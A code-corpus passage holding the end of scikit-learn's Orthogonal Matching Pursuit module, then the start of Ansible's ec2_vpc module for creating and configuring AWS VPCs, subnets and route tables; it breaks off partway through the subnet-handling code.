Targeted squared error, if not None overrides n_nonzero_coefs.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coefs : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
Gram = Gram.copy('F') if copy_Gram else np.asfortranarray(Gram)
if copy_Xy:
Xy = Xy.copy()
min_float = np.finfo(Gram.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (Gram,))
potrs, = get_lapack_funcs(('potrs',), (Gram,))
indices = np.arange(len(Gram)) # keeping track of swapping
alpha = Xy
tol_curr = tol_0
delta = 0
gamma = np.empty(0)
n_active = 0
max_features = len(Gram) if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=Gram.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=Gram.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(alpha))
if lam < n_active or alpha[lam] ** 2 < min_float:
# selected same atom twice, or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
if n_active > 0:
L[n_active, :n_active] = Gram[lam, :n_active]
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
L[n_active, n_active] = np.sqrt(1 - v)
Gram[n_active], Gram[lam] = swap(Gram[n_active], Gram[lam])
Gram.T[n_active], Gram.T[lam] = swap(Gram.T[n_active], Gram.T[lam])
indices[n_active], indices[lam] = indices[lam], indices[n_active]
Xy[n_active], Xy[lam] = Xy[lam], Xy[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], Xy[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
beta = np.dot(Gram[:, :n_active], gamma)
alpha = Xy - beta
if tol is not None:
tol_curr += delta
delta = np.inner(gamma, beta[:n_active])
tol_curr -= delta
if abs(tol_curr) <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def orthogonal_mp(X, y, n_nonzero_coefs=None, tol=None, precompute=False,
copy_X=True, return_path=False,
return_n_iter=False):
"""Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems.
An instance of the problem has the form:
When parametrized by the number of non-zero coefficients using
`n_nonzero_coefs`:
argmin ||y - X\gamma||^2 subject to ||\gamma||_0 <= n_{nonzero coefs}
When parametrized by error using the parameter `tol`:
argmin ||\gamma||_0 subject to ||y - X\gamma||^2 <= tol
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
X : array, shape (n_samples, n_features)
Input data. Columns are assumed to have unit norm.
y : array, shape (n_samples,) or (n_samples, n_targets)
Input targets
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
precompute : {True, False, 'auto'},
Whether to perform precomputations. Improves performance when n_targets
or n_samples is very large.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp_gram
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
X = check_array(X, order='F', copy=copy_X)
copy_X = False
if y.ndim == 1:
y = y.reshape(-1, 1)
y = check_array(y)
if y.shape[1] > 1: # subsequent targets will be affected
copy_X = True
if n_nonzero_coefs is None and tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
n_nonzero_coefs = max(int(0.1 * X.shape[1]), 1)
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > X.shape[1]:
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if precompute == 'auto':
precompute = X.shape[0] > X.shape[1]
if precompute:
G = np.dot(X.T, X)
G = np.asfortranarray(G)
Xy = np.dot(X.T, y)
if tol is not None:
norms_squared = np.sum((y ** 2), axis=0)
else:
norms_squared = None
return orthogonal_mp_gram(G, Xy, n_nonzero_coefs, tol, norms_squared,
copy_Gram=copy_X, copy_Xy=False,
return_path=return_path)
if return_path:
coef = np.zeros((X.shape[1], y.shape[1], X.shape[1]))
else:
coef = np.zeros((X.shape[1], y.shape[1]))
n_iters = []
for k in range(y.shape[1]):
out = _cholesky_omp(
X, y[:, k], n_nonzero_coefs, tol,
copy_X=copy_X, return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if y.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
def orthogonal_mp_gram(Gram, Xy, n_nonzero_coefs=None, tol=None,
norms_squared=None, copy_Gram=True,
copy_Xy=True, return_path=False,
return_n_iter=False):
"""Gram Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems using only
the Gram matrix X.T * X and the product X.T * y.
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data: X.T * X
Xy : array, shape (n_features,) or (n_features, n_targets)
Input targets multiplied by X: X.T * y
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
norms_squared : array-like, shape (n_targets,)
Squared L2 norms of the lines of y. Required if tol is not None.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
Gram = check_array(Gram, order='F', copy=copy_Gram)
Xy = np.asarray(Xy)
if Xy.ndim > 1 and Xy.shape[1] > 1:
# or subsequent target will be affected
copy_Gram = True
if Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
if tol is not None:
norms_squared = [norms_squared]
if n_nonzero_coefs is None and tol is None:
n_nonzero_coefs = int(0.1 * len(Gram))
if tol is not None and norms_squared is None:
raise ValueError('Gram OMP needs the precomputed norms in order '
'to evaluate the error sum of squares.')
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > len(Gram):
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if return_path:
coef = np.zeros((len(Gram), Xy.shape[1], len(Gram)))
else:
coef = np.zeros((len(Gram), Xy.shape[1]))
n_iters = []
for k in range(Xy.shape[1]):
out = _gram_omp(
Gram, Xy[:, k], n_nonzero_coefs,
norms_squared[k] if tol is not None else None, tol,
copy_Gram=copy_Gram, copy_Xy=copy_Xy,
return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if Xy.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
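# A minimal sketch of the functional API (toy data, values assumed):
#   import numpy as np
#   rng = np.random.RandomState(0)
#   X = rng.randn(50, 20)
#   X /= np.sqrt(np.sum(X ** 2, axis=0))  # unit-norm columns, as assumed above
#   w = np.zeros(20)
#   w[[2, 7, 11]] = [1., -2., .5]
#   y = np.dot(X, w)
#   coef = orthogonal_mp(X, y, n_nonzero_coefs=3)  # recovers the 3-sparse w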
class OrthogonalMatchingPursuit(LinearModel, RegressorMixin):
"""Orthogonal Matching Pursuit model (OMP)
Parameters
----------
n_nonzero_coefs : int, optional
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float, optional
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
precompute : {True, False, 'auto'}, default 'auto'
Whether to use a precomputed Gram and Xy matrix to speed up
calculations. Improves performance when `n_targets` or `n_samples` is
very large. Note that if you already have such matrices, you can pass
them directly to the fit method.
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
coef_ : array, shape (n_features,) or (n_features, n_targets)
parameter vector (w in the formula)
intercept_ : float or array, shape (n_targets,)
independent term in decision function.
n_iter_ : int or array-like
Number of active features across every target.
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
decomposition.sparse_encode
"""
def __init__(self, n_nonzero_coefs=None, tol=None, fit_intercept=True,
normalize=True, precompute='auto'):
self.n_nonzero_coefs = n_nonzero_coefs
self.tol = tol
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
n_features = X.shape[1]
X, y, X_mean, y_mean, X_std, Gram, Xy = \
_pre_fit(X, y, None, self.precompute, self.normalize,
self.fit_intercept, copy=True)
if y.ndim == 1:
y = y[:, np.newaxis]
if self.n_nonzero_coefs is None and self.tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
self.n_nonzero_coefs_ = max(int(0.1 * n_features), 1)
else:
self.n_nonzero_coefs_ = self.n_nonzero_coefs
if Gram is False:
coef_, self.n_iter_ = orthogonal_mp(
X, y, self.n_nonzero_coefs_, self.tol,
precompute=False, copy_X=True,
return_n_iter=True)
else:
norms_sq = np.sum(y ** 2, axis=0) if self.tol is not None else None
coef_, self.n_iter_ = orthogonal_mp_gram(
Gram, Xy=Xy, n_nonzero_coefs=self.n_nonzero_coefs_,
tol=self.tol, norms_squared=norms_sq,
copy_Gram=True, copy_Xy=True,
return_n_iter=True)
self.coef_ = coef_.T
self._set_intercept(X_mean, y_mean, X_std)
return self
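    # Estimator-API sketch (illustrative; X and y as in the fit docstring):
    #   omp = OrthogonalMatchingPursuit(n_nonzero_coefs=3).fit(X, y)
    #   y_pred = omp.predict(X)
    #   support = np.flatnonzero(omp.coef_)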
def _omp_path_residues(X_train, y_train, X_test, y_test, copy=True,
fit_intercept=True, normalize=True, max_iter=100):
"""Compute the residues on left-out data for a full LARS path
Parameters
-----------
X_train : array, shape (n_samples, n_features)
The data to fit the LARS on
y_train : array, shape (n_samples)
The target variable to fit LARS on
X_test : array, shape (n_samples, n_features)
The data to compute the residues on
y_test : array, shape (n_samples)
The target variable to compute the residues on
copy : boolean, optional
Whether X_train, X_test, y_train and y_test should be copied. If
False, they may be overwritten.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If True, the regressors X will be normalized before regression.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 100 by default.
Returns
-------
residues: array, shape (n_samples, max_features)
Residues of the prediction on the test data
"""
if copy:
X_train = X_train.copy()
y_train = y_train.copy()
X_test = X_test.copy()
y_test = y_test.copy()
if fit_intercept:
X_mean = X_train.mean(axis=0)
X_train -= X_mean
X_test -= X_mean
y_mean = y_train.mean(axis=0)
y_train = as_float_array(y_train, copy=False)
y_train -= y_mean
y_test = as_float_array(y_test, copy=False)
y_test -= y_mean
if normalize:
norms = np.sqrt(np.sum(X_train ** 2, axis=0))
nonzeros = np.flatnonzero(norms)
X_train[:, nonzeros] /= norms[nonzeros]
coefs = orthogonal_mp(X_train, y_train, n_nonzero_coefs=max_iter, tol=None,
precompute=False, copy_X=False,
return_path=True)
if coefs.ndim == 1:
coefs = coefs[:, np.newaxis]
if normalize:
coefs[nonzeros] /= norms[nonzeros][:, np.newaxis]
return np.dot(coefs.T, X_test.T) - y_test
class OrthogonalMatchingPursuitCV(LinearModel, RegressorMixin):
"""Cross-validated Orthogonal Matching Pursuit model (OMP)
Parameters
----------
copy : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 10% of ``n_features`` but at least 5 if available.
cv : cross-validation generator, optional
see :mod:`sklearn.cross_validation`. If ``None`` is passed, default to
a 5-fold strategy
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs
verbose : boolean or integer, optional
Sets the verbosity amount
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
intercept_ : float or array, shape (n_targets,)
Independent term in decision function.
coef_ : array, shape (n_features,) or (n_features, n_targets)
Parameter vector (w in the problem formulation).
n_nonzero_coefs_ : int
Estimated number of non-zero coefficients giving the best mean squared
error over the cross-validation folds.
n_iter_ : int or array-like
Number of active features across every target for the model refit with
the best hyperparameters got by cross-validating across all folds.
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
OrthogonalMatchingPursuit
LarsCV
LassoLarsCV
decomposition.sparse_encode
"""
def __init__(self, copy=True, fit_intercept=True, normalize=True,
max_iter=None, cv=None, n_jobs=1, verbose=False):
self.copy = copy
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.cv = cv
self.n_jobs = n_jobs
self.verbose = verbose
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape [n_samples, n_features]
Training data.
y : array-like, shape [n_samples]
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, y_numeric=True)
X = as_float_array(X, copy=False, force_all_finite=False)
cv = check_cv(self.cv, X, y, classifier=False)
max_iter = (min(max(int(0.1 * X.shape[1]), 5), X.shape[1])
if not self.max_iter
else self.max_iter)
cv_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_omp_path_residues)(
X[train], y[train], X[test], y[test], self.copy,
self.fit_intercept, self.normalize, max_iter)
for train, test in cv)
min_early_stop = min(fold.shape[0] for fold in cv_paths)
mse_folds = np.array([(fold[:min_early_stop] ** 2).mean(axis=1)
for fold in cv_paths])
best_n_nonzero_coefs = np.argmin(mse_folds.mean(axis=0)) + 1
self.n_nonzero_coefs_ = best_n_nonzero_coefs
omp = OrthogonalMatchingPursuit(n_nonzero_coefs=best_n_nonzero_coefs,
fit_intercept=self.fit_intercept,
normalize=self.normalize)
omp.fit(X, y)
self.coef_ = omp.coef_
self.intercept_ = omp.intercept_
self.n_iter_ = omp.n_iter_
return self
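    # CV sketch (illustrative): let cross-validation pick the sparsity level,
    # then read it back from the refit model.
    #   omp_cv = OrthogonalMatchingPursuitCV(cv=5).fit(X, y)
    #   best_k = omp_cv.n_nonzero_coefs_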
| bsd-3-clause |
davidobrien1985/ansible-modules-core | cloud/amazon/ec2_vpc.py | 6 | 29668 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc
short_description: configure AWS virtual private clouds
description:
  - Creates or terminates AWS virtual private clouds. This module has a dependency on python-boto.
version_added: "1.4"
options:
cidr_block:
description:
- "The cidr block representing the VPC, e.g. 10.0.0.0/16"
required: false, unless state=present
instance_tenancy:
description:
- "The supported tenancy options for instances launched into the VPC."
required: false
default: "default"
choices: [ "default", "dedicated" ]
dns_support:
description:
- toggles the "Enable DNS resolution" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
dns_hostnames:
description:
- toggles the "Enable DNS hostname support for instances" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
subnets:
description:
      - 'A dictionary array of subnets to add of the form: { cidr: ..., az: ... , resource_tags: ... }. Where az is the desired availability zone of the subnet, but it is not required. Tags (i.e.: resource_tags) are also optional and use dictionary form: { "Environment":"Dev", "Tier":"Web", ...}. All VPC subnets not in this list will be removed as well. As of 1.8, if the subnets parameter is not specified, no existing subnets will be modified.'
      - 'Subnet tags follow the same rules as resource_tags for the VPC below; the main difference is that subnet tags not specified here will be deleted.'
    required: false
    default: null
vpc_id:
description:
- A VPC id to terminate when state=absent
required: false
default: null
resource_tags:
description:
- 'A dictionary array of resource tags of the form: { tag1: value1, tag2: value2 }. Tags in this list are used in conjunction with CIDR block to uniquely identify a VPC in lieu of vpc_id. Therefore, if CIDR/Tag combination does not exist, a new VPC will be created. VPC tags not on this list will be ignored. Prior to 1.7, specifying a resource tag was optional.'
required: true
version_added: "1.6"
internet_gateway:
description:
- Toggle whether there should be an Internet gateway attached to the VPC
required: false
default: "no"
choices: [ "yes", "no" ]
route_tables:
description:
      - 'A dictionary array of route tables to add of the form: { subnets: [172.22.2.0/24, 172.22.3.0/24,], routes: [{ dest: 0.0.0.0/0, gw: igw},], resource_tags: ... }. Where the subnets list is those subnets the route table should be associated with, and the routes list is a list of routes to be in the table. The special gw keyword igw specifies that the route should go through the internet gateway attached to the VPC. gw also accepts instance-ids, interface-ids, and vpc-peering-connection-ids in addition to igw. resource_tags is optional and uses dictionary form: { "Name": "public", ... }. This module is currently unable to affect the "main" route table due to some limitations in boto, so you must explicitly define the associated subnets or they will be attached to the main table implicitly. As of 1.8, if the route_tables parameter is not specified, no existing routes will be modified.'
required: false
default: null
wait:
description:
- wait for the VPC to be in state 'available' before returning
required: false
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
state:
description:
- Create or terminate the VPC
required: true
choices: [ "present", "absent" ]
author: "Carson Gee (@carsongee)"
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic creation example:
ec2_vpc:
state: present
cidr_block: 172.23.0.0/16
resource_tags: { "Environment":"Development" }
region: us-west-2
# Full creation example with subnets and optional availability zones.
# The absence or presence of subnets deletes or creates them respectively.
ec2_vpc:
state: present
cidr_block: 172.22.0.0/16
resource_tags: { "Environment":"Development" }
subnets:
- cidr: 172.22.1.0/24
az: us-west-2c
resource_tags: { "Environment":"Dev", "Tier" : "Web" }
- cidr: 172.22.2.0/24
az: us-west-2b
resource_tags: { "Environment":"Dev", "Tier" : "App" }
- cidr: 172.22.3.0/24
az: us-west-2a
resource_tags: { "Environment":"Dev", "Tier" : "DB" }
internet_gateway: True
route_tables:
- subnets:
- 172.22.2.0/24
- 172.22.3.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
- subnets:
- 172.22.1.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
region: us-west-2
register: vpc
# Removal of a VPC by id
ec2_vpc:
state: absent
vpc_id: vpc-aaaaaaa
region: us-west-2
If you have added elements not managed by this module, e.g. instances, NATs, etc., then
the delete will fail until those dependencies are removed.
'''
import time
try:
import boto.ec2
import boto.vpc
from boto.exception import EC2ResponseError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_vpc_info(vpc):
"""
Retrieves vpc information from an instance
ID and returns it as a dictionary
"""
return({
'id': vpc.id,
'cidr_block': vpc.cidr_block,
'dhcp_options_id': vpc.dhcp_options_id,
'region': vpc.region.name,
'state': vpc.state,
})
def find_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Finds a VPC that matches a specific id or cidr + tags
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A VPC object that matches either an ID or CIDR and one or more tag values
"""
    if vpc_id is None and cidr is None:
module.fail_json(
msg='You must specify either a vpc_id or a cidr block + list of unique tags, aborting'
)
found_vpcs = []
resource_tags = module.params.get('resource_tags')
# Check for existing VPC by cidr_block or id
if vpc_id is not None:
found_vpcs = vpc_conn.get_all_vpcs(None, {'vpc-id': vpc_id, 'state': 'available',})
else:
previous_vpcs = vpc_conn.get_all_vpcs(None, {'cidr': cidr, 'state': 'available'})
for vpc in previous_vpcs:
# Get all tags for each of the found VPCs
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
# If the supplied list of ID Tags match a subset of the VPC Tags, we found our VPC
if resource_tags and set(resource_tags.items()).issubset(set(vpc_tags.items())):
found_vpcs.append(vpc)
found_vpc = None
if len(found_vpcs) == 1:
found_vpc = found_vpcs[0]
if len(found_vpcs) > 1:
module.fail_json(msg='Found more than one vpc based on the supplied criteria, aborting')
return (found_vpc)
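# Lookup sketch (CIDR value assumed; identifying tags come from module.params):
#   vpc = find_vpc(module, vpc_conn, cidr='172.23.0.0/16')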
def routes_match(rt_list=None, rt=None, igw=None):
"""
Check if the route table has all routes as in given list
rt_list : A list if routes provided in the module
rt : The Remote route table object
igw : The internet gateway object for this vpc
Returns:
        True when the provided routes and the remote routes are the same.
        False when the provided routes and the remote routes differ.
"""
local_routes = []
remote_routes = []
for route in rt_list:
route_kwargs = {
'gateway_id': None,
'instance_id': None,
'interface_id': None,
'vpc_peering_connection_id': None,
'state': 'active'
}
if route['gw'] == 'igw':
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
route_kwargs['destination_cidr_block'] = route['dest']
local_routes.append(route_kwargs)
for j in rt.routes:
remote_routes.append(j.__dict__)
    # A match requires every local route to be present among the remote ones.
    for i in local_routes:
        if not any(set(i.items()).issubset(set(j.items())) for j in remote_routes):
            return False
    return True
def rtb_changed(route_tables=None, vpc_conn=None, module=None, vpc=None, igw=None):
"""
Checks if the remote routes match the local routes.
route_tables : Route_tables parameter in the module
    vpc_conn : The VPC connection object
module : The module object
vpc : The vpc object for this route table
igw : The internet gateway object for this vpc
Returns:
    True when the provided routes differ from the remote routes, or when
    the subnet associations differ.
    False when both the routes and the subnet associations match.
"""
    # We add one to account for the main table
rtb_len = len(route_tables) + 1
remote_rtb_len = len(vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id}))
if remote_rtb_len != rtb_len:
return True
for rt in route_tables:
rt_id = None
for sn in rt['subnets']:
rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id })
if len(rsn) != 1:
module.fail_json(
msg='The subnet {0} to associate with route_table {1} ' \
'does not exist, aborting'.format(sn, rt)
)
nrt = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id, 'association.subnet-id': rsn[0].id})
if not nrt:
return True
else:
nrt = nrt[0]
if not rt_id:
rt_id = nrt.id
if not routes_match(rt['routes'], nrt, igw):
return True
continue
else:
if rt_id == nrt.id:
continue
else:
return True
return False
def create_vpc(module, vpc_conn):
"""
Creates a new or modifies an existing VPC.
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A dictionary with information
about the VPC and subnets that were launched
"""
id = module.params.get('vpc_id')
cidr_block = module.params.get('cidr_block')
instance_tenancy = module.params.get('instance_tenancy')
dns_support = module.params.get('dns_support')
dns_hostnames = module.params.get('dns_hostnames')
subnets = module.params.get('subnets')
internet_gateway = module.params.get('internet_gateway')
route_tables = module.params.get('route_tables')
vpc_spec_tags = module.params.get('resource_tags')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
# Check for existing VPC by cidr_block + tags or id
previous_vpc = find_vpc(module, vpc_conn, id, cidr_block)
if previous_vpc is not None:
changed = False
vpc = previous_vpc
else:
changed = True
try:
vpc = vpc_conn.create_vpc(cidr_block, instance_tenancy)
# wait here until the vpc is available
pending = True
wait_timeout = time.time() + wait_timeout
while wait and wait_timeout > time.time() and pending:
try:
pvpc = vpc_conn.get_all_vpcs(vpc.id)
if hasattr(pvpc, 'state'):
if pvpc.state == "available":
pending = False
elif hasattr(pvpc[0], 'state'):
if pvpc[0].state == "available":
pending = False
# sometimes vpc_conn.create_vpc() will return a vpc that can't be found yet by vpc_conn.get_all_vpcs()
# when that happens, just wait a bit longer and try again
except boto.exception.BotoServerError, e:
if e.error_code != 'InvalidVpcID.NotFound':
raise
if pending:
time.sleep(5)
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "wait for vpc availability timeout on %s" % time.asctime())
except boto.exception.BotoServerError, e:
module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message))
# Done with base VPC, now change to attributes and features.
# Add resource tags
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
if not set(vpc_spec_tags.items()).issubset(set(vpc_tags.items())):
new_tags = {}
for (key, value) in set(vpc_spec_tags.items()):
if (key, value) not in set(vpc_tags.items()):
new_tags[key] = value
if new_tags:
vpc_conn.create_tags(vpc.id, new_tags)
# boto doesn't appear to have a way to determine the existing
# value of the dns attributes, so we just set them.
# It also must be done one at a time.
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_support=dns_support)
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_hostnames=dns_hostnames)
# Process all subnet properties
if subnets is not None:
if not isinstance(subnets, list):
module.fail_json(msg='subnets needs to be a list of cidr blocks')
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
# First add all new subnets
for subnet in subnets:
